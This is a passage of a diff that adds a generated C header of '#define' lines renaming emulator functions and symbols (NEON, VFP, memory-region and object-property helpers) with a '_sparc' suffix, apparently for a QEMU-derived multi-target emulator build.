+#define helper_neon_pmin_s8 helper_neon_pmin_s8_sparc +#define helper_neon_pmin_u16 helper_neon_pmin_u16_sparc +#define helper_neon_pmin_u8 helper_neon_pmin_u8_sparc +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_sparc +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_sparc +#define helper_neon_qabs_s16 helper_neon_qabs_s16_sparc +#define helper_neon_qabs_s32 helper_neon_qabs_s32_sparc +#define helper_neon_qabs_s64 helper_neon_qabs_s64_sparc +#define helper_neon_qabs_s8 helper_neon_qabs_s8_sparc +#define helper_neon_qadd_s16 helper_neon_qadd_s16_sparc +#define helper_neon_qadd_s32 helper_neon_qadd_s32_sparc +#define helper_neon_qadd_s64 helper_neon_qadd_s64_sparc +#define helper_neon_qadd_s8 helper_neon_qadd_s8_sparc +#define helper_neon_qadd_u16 helper_neon_qadd_u16_sparc +#define helper_neon_qadd_u32 helper_neon_qadd_u32_sparc +#define helper_neon_qadd_u64 helper_neon_qadd_u64_sparc +#define helper_neon_qadd_u8 helper_neon_qadd_u8_sparc +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_sparc +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_sparc +#define helper_neon_qneg_s16 helper_neon_qneg_s16_sparc +#define helper_neon_qneg_s32 helper_neon_qneg_s32_sparc +#define helper_neon_qneg_s64 helper_neon_qneg_s64_sparc +#define helper_neon_qneg_s8 helper_neon_qneg_s8_sparc +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_sparc +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_sparc +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_sparc +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_sparc +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_sparc +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_sparc +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_sparc +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_sparc +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_sparc +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_sparc +#define helper_neon_qshl_s16 helper_neon_qshl_s16_sparc +#define helper_neon_qshl_s32 
helper_neon_qshl_s32_sparc +#define helper_neon_qshl_s64 helper_neon_qshl_s64_sparc +#define helper_neon_qshl_s8 helper_neon_qshl_s8_sparc +#define helper_neon_qshl_u16 helper_neon_qshl_u16_sparc +#define helper_neon_qshl_u32 helper_neon_qshl_u32_sparc +#define helper_neon_qshl_u64 helper_neon_qshl_u64_sparc +#define helper_neon_qshl_u8 helper_neon_qshl_u8_sparc +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_sparc +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_sparc +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_sparc +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_sparc +#define helper_neon_qsub_s16 helper_neon_qsub_s16_sparc +#define helper_neon_qsub_s32 helper_neon_qsub_s32_sparc +#define helper_neon_qsub_s64 helper_neon_qsub_s64_sparc +#define helper_neon_qsub_s8 helper_neon_qsub_s8_sparc +#define helper_neon_qsub_u16 helper_neon_qsub_u16_sparc +#define helper_neon_qsub_u32 helper_neon_qsub_u32_sparc +#define helper_neon_qsub_u64 helper_neon_qsub_u64_sparc +#define helper_neon_qsub_u8 helper_neon_qsub_u8_sparc +#define helper_neon_qunzip16 helper_neon_qunzip16_sparc +#define helper_neon_qunzip32 helper_neon_qunzip32_sparc +#define helper_neon_qunzip8 helper_neon_qunzip8_sparc +#define helper_neon_qzip16 helper_neon_qzip16_sparc +#define helper_neon_qzip32 helper_neon_qzip32_sparc +#define helper_neon_qzip8 helper_neon_qzip8_sparc +#define helper_neon_rbit_u8 helper_neon_rbit_u8_sparc +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_sparc +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_sparc +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_sparc +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_sparc +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_sparc +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_sparc +#define helper_neon_rshl_s16 helper_neon_rshl_s16_sparc +#define helper_neon_rshl_s32 helper_neon_rshl_s32_sparc +#define helper_neon_rshl_s64 helper_neon_rshl_s64_sparc +#define helper_neon_rshl_s8 
helper_neon_rshl_s8_sparc +#define helper_neon_rshl_u16 helper_neon_rshl_u16_sparc +#define helper_neon_rshl_u32 helper_neon_rshl_u32_sparc +#define helper_neon_rshl_u64 helper_neon_rshl_u64_sparc +#define helper_neon_rshl_u8 helper_neon_rshl_u8_sparc +#define helper_neon_shl_s16 helper_neon_shl_s16_sparc +#define helper_neon_shl_s32 helper_neon_shl_s32_sparc +#define helper_neon_shl_s64 helper_neon_shl_s64_sparc +#define helper_neon_shl_s8 helper_neon_shl_s8_sparc +#define helper_neon_shl_u16 helper_neon_shl_u16_sparc +#define helper_neon_shl_u32 helper_neon_shl_u32_sparc +#define helper_neon_shl_u64 helper_neon_shl_u64_sparc +#define helper_neon_shl_u8 helper_neon_shl_u8_sparc +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_sparc +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_sparc +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_sparc +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_sparc +#define helper_neon_subl_u16 helper_neon_subl_u16_sparc +#define helper_neon_subl_u32 helper_neon_subl_u32_sparc +#define helper_neon_sub_u16 helper_neon_sub_u16_sparc +#define helper_neon_sub_u8 helper_neon_sub_u8_sparc +#define helper_neon_tbl helper_neon_tbl_sparc +#define helper_neon_tst_u16 helper_neon_tst_u16_sparc +#define helper_neon_tst_u32 helper_neon_tst_u32_sparc +#define helper_neon_tst_u8 helper_neon_tst_u8_sparc +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_sparc +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_sparc +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_sparc +#define helper_neon_unzip16 helper_neon_unzip16_sparc +#define helper_neon_unzip8 helper_neon_unzip8_sparc +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_sparc +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_sparc +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_sparc +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_sparc +#define helper_neon_widen_s16 helper_neon_widen_s16_sparc +#define helper_neon_widen_s8 
helper_neon_widen_s8_sparc +#define helper_neon_widen_u16 helper_neon_widen_u16_sparc +#define helper_neon_widen_u8 helper_neon_widen_u8_sparc +#define helper_neon_zip16 helper_neon_zip16_sparc +#define helper_neon_zip8 helper_neon_zip8_sparc +#define helper_pre_hvc helper_pre_hvc_sparc +#define helper_pre_smc helper_pre_smc_sparc +#define helper_qadd16 helper_qadd16_sparc +#define helper_qadd8 helper_qadd8_sparc +#define helper_qaddsubx helper_qaddsubx_sparc +#define helper_qsub16 helper_qsub16_sparc +#define helper_qsub8 helper_qsub8_sparc +#define helper_qsubaddx helper_qsubaddx_sparc +#define helper_rbit helper_rbit_sparc +#define helper_recpe_f32 helper_recpe_f32_sparc +#define helper_recpe_f64 helper_recpe_f64_sparc +#define helper_recpe_u32 helper_recpe_u32_sparc +#define helper_recps_f32 helper_recps_f32_sparc +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_sparc +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc +#define helper_ret_stb_mmu helper_ret_stb_mmu_sparc +#define helper_rintd helper_rintd_sparc +#define helper_rintd_exact helper_rintd_exact_sparc +#define helper_rints helper_rints_sparc +#define helper_rints_exact helper_rints_exact_sparc +#define helper_ror_cc helper_ror_cc_sparc +#define helper_rsqrte_f32 helper_rsqrte_f32_sparc +#define helper_rsqrte_f64 helper_rsqrte_f64_sparc +#define helper_rsqrte_u32 helper_rsqrte_u32_sparc +#define helper_rsqrts_f32 helper_rsqrts_f32_sparc +#define helper_sadd16 helper_sadd16_sparc +#define helper_sadd8 helper_sadd8_sparc +#define helper_saddsubx helper_saddsubx_sparc +#define helper_sar_cc helper_sar_cc_sparc +#define helper_sdiv helper_sdiv_sparc +#define helper_sel_flags helper_sel_flags_sparc +#define helper_set_cp_reg helper_set_cp_reg_sparc +#define helper_set_cp_reg64 helper_set_cp_reg64_sparc +#define helper_set_neon_rmode helper_set_neon_rmode_sparc +#define helper_set_r13_banked helper_set_r13_banked_sparc +#define helper_set_rmode 
helper_set_rmode_sparc +#define helper_set_user_reg helper_set_user_reg_sparc +#define helper_shadd16 helper_shadd16_sparc +#define helper_shadd8 helper_shadd8_sparc +#define helper_shaddsubx helper_shaddsubx_sparc +#define helper_shl_cc helper_shl_cc_sparc +#define helper_shr_cc helper_shr_cc_sparc +#define helper_shsub16 helper_shsub16_sparc +#define helper_shsub8 helper_shsub8_sparc +#define helper_shsubaddx helper_shsubaddx_sparc +#define helper_ssat helper_ssat_sparc +#define helper_ssat16 helper_ssat16_sparc +#define helper_ssub16 helper_ssub16_sparc +#define helper_ssub8 helper_ssub8_sparc +#define helper_ssubaddx helper_ssubaddx_sparc +#define helper_stb_mmu helper_stb_mmu_sparc +#define helper_stl_mmu helper_stl_mmu_sparc +#define helper_stq_mmu helper_stq_mmu_sparc +#define helper_stw_mmu helper_stw_mmu_sparc +#define helper_sub_saturate helper_sub_saturate_sparc +#define helper_sub_usaturate helper_sub_usaturate_sparc +#define helper_sxtb16 helper_sxtb16_sparc +#define helper_uadd16 helper_uadd16_sparc +#define helper_uadd8 helper_uadd8_sparc +#define helper_uaddsubx helper_uaddsubx_sparc +#define helper_udiv helper_udiv_sparc +#define helper_uhadd16 helper_uhadd16_sparc +#define helper_uhadd8 helper_uhadd8_sparc +#define helper_uhaddsubx helper_uhaddsubx_sparc +#define helper_uhsub16 helper_uhsub16_sparc +#define helper_uhsub8 helper_uhsub8_sparc +#define helper_uhsubaddx helper_uhsubaddx_sparc +#define helper_uqadd16 helper_uqadd16_sparc +#define helper_uqadd8 helper_uqadd8_sparc +#define helper_uqaddsubx helper_uqaddsubx_sparc +#define helper_uqsub16 helper_uqsub16_sparc +#define helper_uqsub8 helper_uqsub8_sparc +#define helper_uqsubaddx helper_uqsubaddx_sparc +#define helper_usad8 helper_usad8_sparc +#define helper_usat helper_usat_sparc +#define helper_usat16 helper_usat16_sparc +#define helper_usub16 helper_usub16_sparc +#define helper_usub8 helper_usub8_sparc +#define helper_usubaddx helper_usubaddx_sparc +#define helper_uxtb16 
helper_uxtb16_sparc +#define helper_v7m_mrs helper_v7m_mrs_sparc +#define helper_v7m_msr helper_v7m_msr_sparc +#define helper_vfp_absd helper_vfp_absd_sparc +#define helper_vfp_abss helper_vfp_abss_sparc +#define helper_vfp_addd helper_vfp_addd_sparc +#define helper_vfp_adds helper_vfp_adds_sparc +#define helper_vfp_cmpd helper_vfp_cmpd_sparc +#define helper_vfp_cmped helper_vfp_cmped_sparc +#define helper_vfp_cmpes helper_vfp_cmpes_sparc +#define helper_vfp_cmps helper_vfp_cmps_sparc +#define helper_vfp_divd helper_vfp_divd_sparc +#define helper_vfp_divs helper_vfp_divs_sparc +#define helper_vfp_fcvtds helper_vfp_fcvtds_sparc +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_sparc +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_sparc +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_sparc +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_sparc +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_sparc +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_sparc +#define helper_vfp_maxd helper_vfp_maxd_sparc +#define helper_vfp_maxnumd helper_vfp_maxnumd_sparc +#define helper_vfp_maxnums helper_vfp_maxnums_sparc +#define helper_vfp_maxs helper_vfp_maxs_sparc +#define helper_vfp_mind helper_vfp_mind_sparc +#define helper_vfp_minnumd helper_vfp_minnumd_sparc +#define helper_vfp_minnums helper_vfp_minnums_sparc +#define helper_vfp_mins helper_vfp_mins_sparc +#define helper_vfp_muladdd helper_vfp_muladdd_sparc +#define helper_vfp_muladds helper_vfp_muladds_sparc +#define helper_vfp_muld helper_vfp_muld_sparc +#define helper_vfp_muls helper_vfp_muls_sparc +#define helper_vfp_negd helper_vfp_negd_sparc +#define helper_vfp_negs helper_vfp_negs_sparc +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_sparc +#define helper_vfp_shtod helper_vfp_shtod_sparc +#define helper_vfp_shtos helper_vfp_shtos_sparc +#define helper_vfp_sitod helper_vfp_sitod_sparc +#define helper_vfp_sitos helper_vfp_sitos_sparc +#define helper_vfp_sltod 
helper_vfp_sltod_sparc +#define helper_vfp_sltos helper_vfp_sltos_sparc +#define helper_vfp_sqrtd helper_vfp_sqrtd_sparc +#define helper_vfp_sqrts helper_vfp_sqrts_sparc +#define helper_vfp_sqtod helper_vfp_sqtod_sparc +#define helper_vfp_sqtos helper_vfp_sqtos_sparc +#define helper_vfp_subd helper_vfp_subd_sparc +#define helper_vfp_subs helper_vfp_subs_sparc +#define helper_vfp_toshd helper_vfp_toshd_sparc +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_sparc +#define helper_vfp_toshs helper_vfp_toshs_sparc +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_sparc +#define helper_vfp_tosid helper_vfp_tosid_sparc +#define helper_vfp_tosis helper_vfp_tosis_sparc +#define helper_vfp_tosizd helper_vfp_tosizd_sparc +#define helper_vfp_tosizs helper_vfp_tosizs_sparc +#define helper_vfp_tosld helper_vfp_tosld_sparc +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_sparc +#define helper_vfp_tosls helper_vfp_tosls_sparc +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_sparc +#define helper_vfp_tosqd helper_vfp_tosqd_sparc +#define helper_vfp_tosqs helper_vfp_tosqs_sparc +#define helper_vfp_touhd helper_vfp_touhd_sparc +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_sparc +#define helper_vfp_touhs helper_vfp_touhs_sparc +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_sparc +#define helper_vfp_touid helper_vfp_touid_sparc +#define helper_vfp_touis helper_vfp_touis_sparc +#define helper_vfp_touizd helper_vfp_touizd_sparc +#define helper_vfp_touizs helper_vfp_touizs_sparc +#define helper_vfp_tould helper_vfp_tould_sparc +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_sparc +#define helper_vfp_touls helper_vfp_touls_sparc +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_sparc +#define helper_vfp_touqd helper_vfp_touqd_sparc +#define helper_vfp_touqs helper_vfp_touqs_sparc +#define helper_vfp_uhtod 
helper_vfp_uhtod_sparc +#define helper_vfp_uhtos helper_vfp_uhtos_sparc +#define helper_vfp_uitod helper_vfp_uitod_sparc +#define helper_vfp_uitos helper_vfp_uitos_sparc +#define helper_vfp_ultod helper_vfp_ultod_sparc +#define helper_vfp_ultos helper_vfp_ultos_sparc +#define helper_vfp_uqtod helper_vfp_uqtod_sparc +#define helper_vfp_uqtos helper_vfp_uqtos_sparc +#define helper_wfe helper_wfe_sparc +#define helper_wfi helper_wfi_sparc +#define hex2decimal hex2decimal_sparc +#define hw_breakpoint_update hw_breakpoint_update_sparc +#define hw_breakpoint_update_all hw_breakpoint_update_all_sparc +#define hw_watchpoint_update hw_watchpoint_update_sparc +#define hw_watchpoint_update_all hw_watchpoint_update_all_sparc +#define _init _init_sparc +#define init_cpreg_list init_cpreg_list_sparc +#define init_lists init_lists_sparc +#define input_type_enum input_type_enum_sparc +#define int128_2_64 int128_2_64_sparc +#define int128_add int128_add_sparc +#define int128_addto int128_addto_sparc +#define int128_and int128_and_sparc +#define int128_eq int128_eq_sparc +#define int128_ge int128_ge_sparc +#define int128_get64 int128_get64_sparc +#define int128_gt int128_gt_sparc +#define int128_le int128_le_sparc +#define int128_lt int128_lt_sparc +#define int128_make64 int128_make64_sparc +#define int128_max int128_max_sparc +#define int128_min int128_min_sparc +#define int128_ne int128_ne_sparc +#define int128_neg int128_neg_sparc +#define int128_nz int128_nz_sparc +#define int128_rshift int128_rshift_sparc +#define int128_sub int128_sub_sparc +#define int128_subfrom int128_subfrom_sparc +#define int128_zero int128_zero_sparc +#define int16_to_float32 int16_to_float32_sparc +#define int16_to_float64 int16_to_float64_sparc +#define int32_to_float128 int32_to_float128_sparc +#define int32_to_float32 int32_to_float32_sparc +#define int32_to_float64 int32_to_float64_sparc +#define int32_to_floatx80 int32_to_floatx80_sparc +#define int64_to_float128 int64_to_float128_sparc +#define 
int64_to_float32 int64_to_float32_sparc +#define int64_to_float64 int64_to_float64_sparc +#define int64_to_floatx80 int64_to_floatx80_sparc +#define invalidate_and_set_dirty invalidate_and_set_dirty_sparc +#define invalidate_page_bitmap invalidate_page_bitmap_sparc +#define io_mem_read io_mem_read_sparc +#define io_mem_write io_mem_write_sparc +#define io_readb io_readb_sparc +#define io_readl io_readl_sparc +#define io_readq io_readq_sparc +#define io_readw io_readw_sparc +#define iotlb_to_region iotlb_to_region_sparc +#define io_writeb io_writeb_sparc +#define io_writel io_writel_sparc +#define io_writeq io_writeq_sparc +#define io_writew io_writew_sparc +#define is_a64 is_a64_sparc +#define is_help_option is_help_option_sparc +#define isr_read isr_read_sparc +#define is_valid_option_list is_valid_option_list_sparc +#define iwmmxt_load_creg iwmmxt_load_creg_sparc +#define iwmmxt_load_reg iwmmxt_load_reg_sparc +#define iwmmxt_store_creg iwmmxt_store_creg_sparc +#define iwmmxt_store_reg iwmmxt_store_reg_sparc +#define __jit_debug_descriptor __jit_debug_descriptor_sparc +#define __jit_debug_register_code __jit_debug_register_code_sparc +#define kvm_to_cpreg_id kvm_to_cpreg_id_sparc +#define last_ram_offset last_ram_offset_sparc +#define ldl_be_p ldl_be_p_sparc +#define ldl_be_phys ldl_be_phys_sparc +#define ldl_he_p ldl_he_p_sparc +#define ldl_le_p ldl_le_p_sparc +#define ldl_le_phys ldl_le_phys_sparc +#define ldl_phys ldl_phys_sparc +#define ldl_phys_internal ldl_phys_internal_sparc +#define ldq_be_p ldq_be_p_sparc +#define ldq_be_phys ldq_be_phys_sparc +#define ldq_he_p ldq_he_p_sparc +#define ldq_le_p ldq_le_p_sparc +#define ldq_le_phys ldq_le_phys_sparc +#define ldq_phys ldq_phys_sparc +#define ldq_phys_internal ldq_phys_internal_sparc +#define ldst_name ldst_name_sparc +#define ldub_p ldub_p_sparc +#define ldub_phys ldub_phys_sparc +#define lduw_be_p lduw_be_p_sparc +#define lduw_be_phys lduw_be_phys_sparc +#define lduw_he_p lduw_he_p_sparc +#define lduw_le_p 
lduw_le_p_sparc +#define lduw_le_phys lduw_le_phys_sparc +#define lduw_phys lduw_phys_sparc +#define lduw_phys_internal lduw_phys_internal_sparc +#define le128 le128_sparc +#define linked_bp_matches linked_bp_matches_sparc +#define listener_add_address_space listener_add_address_space_sparc +#define load_cpu_offset load_cpu_offset_sparc +#define load_reg load_reg_sparc +#define load_reg_var load_reg_var_sparc +#define log_cpu_state log_cpu_state_sparc +#define lpae_cp_reginfo lpae_cp_reginfo_sparc +#define lt128 lt128_sparc +#define machine_class_init machine_class_init_sparc +#define machine_finalize machine_finalize_sparc +#define machine_info machine_info_sparc +#define machine_initfn machine_initfn_sparc +#define machine_register_types machine_register_types_sparc +#define machvirt_init machvirt_init_sparc +#define machvirt_machine_init machvirt_machine_init_sparc +#define maj maj_sparc +#define mapping_conflict mapping_conflict_sparc +#define mapping_contiguous mapping_contiguous_sparc +#define mapping_have_same_region mapping_have_same_region_sparc +#define mapping_merge mapping_merge_sparc +#define mem_add mem_add_sparc +#define mem_begin mem_begin_sparc +#define mem_commit mem_commit_sparc +#define memory_access_is_direct memory_access_is_direct_sparc +#define memory_access_size memory_access_size_sparc +#define memory_init memory_init_sparc +#define memory_listener_match memory_listener_match_sparc +#define memory_listener_register memory_listener_register_sparc +#define memory_listener_unregister memory_listener_unregister_sparc +#define memory_map_init memory_map_init_sparc +#define memory_mapping_filter memory_mapping_filter_sparc +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_sparc +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc +#define memory_mapping_list_free memory_mapping_list_free_sparc +#define memory_mapping_list_init memory_mapping_list_init_sparc +#define 
memory_region_access_valid memory_region_access_valid_sparc +#define memory_region_add_subregion memory_region_add_subregion_sparc +#define memory_region_add_subregion_common memory_region_add_subregion_common_sparc +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc +#define memory_region_big_endian memory_region_big_endian_sparc +#define memory_region_clear_pending memory_region_clear_pending_sparc +#define memory_region_del_subregion memory_region_del_subregion_sparc +#define memory_region_destructor_alias memory_region_destructor_alias_sparc +#define memory_region_destructor_none memory_region_destructor_none_sparc +#define memory_region_destructor_ram memory_region_destructor_ram_sparc +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_sparc +#define memory_region_dispatch_read memory_region_dispatch_read_sparc +#define memory_region_dispatch_read1 memory_region_dispatch_read1_sparc +#define memory_region_dispatch_write memory_region_dispatch_write_sparc +#define memory_region_escape_name memory_region_escape_name_sparc +#define memory_region_finalize memory_region_finalize_sparc +#define memory_region_find memory_region_find_sparc +#define memory_region_get_addr memory_region_get_addr_sparc +#define memory_region_get_alignment memory_region_get_alignment_sparc +#define memory_region_get_container memory_region_get_container_sparc +#define memory_region_get_fd memory_region_get_fd_sparc +#define memory_region_get_may_overlap memory_region_get_may_overlap_sparc +#define memory_region_get_priority memory_region_get_priority_sparc +#define memory_region_get_ram_addr memory_region_get_ram_addr_sparc +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc +#define memory_region_get_size memory_region_get_size_sparc +#define memory_region_info memory_region_info_sparc +#define memory_region_init memory_region_init_sparc +#define memory_region_init_alias memory_region_init_alias_sparc 
+#define memory_region_initfn memory_region_initfn_sparc +#define memory_region_init_io memory_region_init_io_sparc +#define memory_region_init_ram memory_region_init_ram_sparc +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc +#define memory_region_init_reservation memory_region_init_reservation_sparc +#define memory_region_is_iommu memory_region_is_iommu_sparc +#define memory_region_is_logging memory_region_is_logging_sparc +#define memory_region_is_mapped memory_region_is_mapped_sparc +#define memory_region_is_ram memory_region_is_ram_sparc +#define memory_region_is_rom memory_region_is_rom_sparc +#define memory_region_is_romd memory_region_is_romd_sparc +#define memory_region_is_skip_dump memory_region_is_skip_dump_sparc +#define memory_region_is_unassigned memory_region_is_unassigned_sparc +#define memory_region_name memory_region_name_sparc +#define memory_region_need_escape memory_region_need_escape_sparc +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_sparc +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_sparc +#define memory_region_present memory_region_present_sparc +#define memory_region_read_accessor memory_region_read_accessor_sparc +#define memory_region_readd_subregion memory_region_readd_subregion_sparc +#define memory_region_ref memory_region_ref_sparc +#define memory_region_resolve_container memory_region_resolve_container_sparc +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_sparc +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc +#define memory_region_set_address memory_region_set_address_sparc +#define memory_region_set_alias_offset memory_region_set_alias_offset_sparc +#define memory_region_set_enabled memory_region_set_enabled_sparc +#define memory_region_set_readonly memory_region_set_readonly_sparc +#define memory_region_set_skip_dump memory_region_set_skip_dump_sparc +#define memory_region_size 
memory_region_size_sparc +#define memory_region_to_address_space memory_region_to_address_space_sparc +#define memory_region_transaction_begin memory_region_transaction_begin_sparc +#define memory_region_transaction_commit memory_region_transaction_commit_sparc +#define memory_region_unref memory_region_unref_sparc +#define memory_region_update_container_subregions memory_region_update_container_subregions_sparc +#define memory_region_write_accessor memory_region_write_accessor_sparc +#define memory_region_wrong_endianness memory_region_wrong_endianness_sparc +#define memory_try_enable_merging memory_try_enable_merging_sparc +#define module_call_init module_call_init_sparc +#define module_load module_load_sparc +#define mpidr_cp_reginfo mpidr_cp_reginfo_sparc +#define mpidr_read mpidr_read_sparc +#define msr_mask msr_mask_sparc +#define mul128By64To192 mul128By64To192_sparc +#define mul128To256 mul128To256_sparc +#define mul64To128 mul64To128_sparc +#define muldiv64 muldiv64_sparc +#define neon_2rm_is_float_op neon_2rm_is_float_op_sparc +#define neon_2rm_sizes neon_2rm_sizes_sparc +#define neon_3r_sizes neon_3r_sizes_sparc +#define neon_get_scalar neon_get_scalar_sparc +#define neon_load_reg neon_load_reg_sparc +#define neon_load_reg64 neon_load_reg64_sparc +#define neon_load_scratch neon_load_scratch_sparc +#define neon_ls_element_type neon_ls_element_type_sparc +#define neon_reg_offset neon_reg_offset_sparc +#define neon_store_reg neon_store_reg_sparc +#define neon_store_reg64 neon_store_reg64_sparc +#define neon_store_scratch neon_store_scratch_sparc +#define new_ldst_label new_ldst_label_sparc +#define next_list next_list_sparc +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_sparc +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_sparc +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_sparc +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_sparc +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc 
+#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_sparc +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_sparc +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_sparc +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc +#define not_v6_cp_reginfo not_v6_cp_reginfo_sparc +#define not_v7_cp_reginfo not_v7_cp_reginfo_sparc +#define not_v8_cp_reginfo not_v8_cp_reginfo_sparc +#define object_child_foreach object_child_foreach_sparc +#define object_class_foreach object_class_foreach_sparc +#define object_class_foreach_tramp object_class_foreach_tramp_sparc +#define object_class_get_list object_class_get_list_sparc +#define object_class_get_list_tramp object_class_get_list_tramp_sparc +#define object_class_get_parent object_class_get_parent_sparc +#define object_deinit object_deinit_sparc +#define object_dynamic_cast object_dynamic_cast_sparc +#define object_finalize object_finalize_sparc +#define object_finalize_child_property object_finalize_child_property_sparc +#define object_get_child_property object_get_child_property_sparc +#define object_get_link_property object_get_link_property_sparc +#define object_get_root object_get_root_sparc +#define object_initialize_with_type object_initialize_with_type_sparc +#define object_init_with_type object_init_with_type_sparc +#define object_instance_init object_instance_init_sparc +#define object_new_with_type object_new_with_type_sparc +#define object_post_init_with_type object_post_init_with_type_sparc +#define object_property_add_alias object_property_add_alias_sparc +#define object_property_add_link object_property_add_link_sparc +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_sparc +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_sparc +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_sparc +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_sparc +#define 
object_property_allow_set_link object_property_allow_set_link_sparc +#define object_property_del object_property_del_sparc +#define object_property_del_all object_property_del_all_sparc +#define object_property_find object_property_find_sparc +#define object_property_get object_property_get_sparc +#define object_property_get_bool object_property_get_bool_sparc +#define object_property_get_int object_property_get_int_sparc +#define object_property_get_link object_property_get_link_sparc +#define object_property_get_qobject object_property_get_qobject_sparc +#define object_property_get_str object_property_get_str_sparc +#define object_property_get_type object_property_get_type_sparc +#define object_property_is_child object_property_is_child_sparc +#define object_property_set object_property_set_sparc +#define object_property_set_description object_property_set_description_sparc +#define object_property_set_link object_property_set_link_sparc +#define object_property_set_qobject object_property_set_qobject_sparc +#define object_release_link_property object_release_link_property_sparc +#define object_resolve_abs_path object_resolve_abs_path_sparc +#define object_resolve_child_property object_resolve_child_property_sparc +#define object_resolve_link object_resolve_link_sparc +#define object_resolve_link_property object_resolve_link_property_sparc +#define object_resolve_partial_path object_resolve_partial_path_sparc +#define object_resolve_path object_resolve_path_sparc +#define object_resolve_path_component object_resolve_path_component_sparc +#define object_resolve_path_type object_resolve_path_type_sparc +#define object_set_link_property object_set_link_property_sparc +#define object_unparent object_unparent_sparc +#define omap_cachemaint_write omap_cachemaint_write_sparc +#define omap_cp_reginfo omap_cp_reginfo_sparc +#define omap_threadid_write omap_threadid_write_sparc +#define omap_ticonfig_write omap_ticonfig_write_sparc +#define omap_wfi_write 
omap_wfi_write_sparc +#define op_bits op_bits_sparc +#define open_modeflags open_modeflags_sparc +#define op_to_mov op_to_mov_sparc +#define op_to_movi op_to_movi_sparc +#define output_type_enum output_type_enum_sparc +#define packFloat128 packFloat128_sparc +#define packFloat16 packFloat16_sparc +#define packFloat32 packFloat32_sparc +#define packFloat64 packFloat64_sparc +#define packFloatx80 packFloatx80_sparc +#define page_find page_find_sparc +#define page_find_alloc page_find_alloc_sparc +#define page_flush_tb page_flush_tb_sparc +#define page_flush_tb_1 page_flush_tb_1_sparc +#define page_init page_init_sparc +#define page_size_init page_size_init_sparc +#define par par_sparc +#define parse_array parse_array_sparc +#define parse_error parse_error_sparc +#define parse_escape parse_escape_sparc +#define parse_keyword parse_keyword_sparc +#define parse_literal parse_literal_sparc +#define parse_object parse_object_sparc +#define parse_optional parse_optional_sparc +#define parse_option_bool 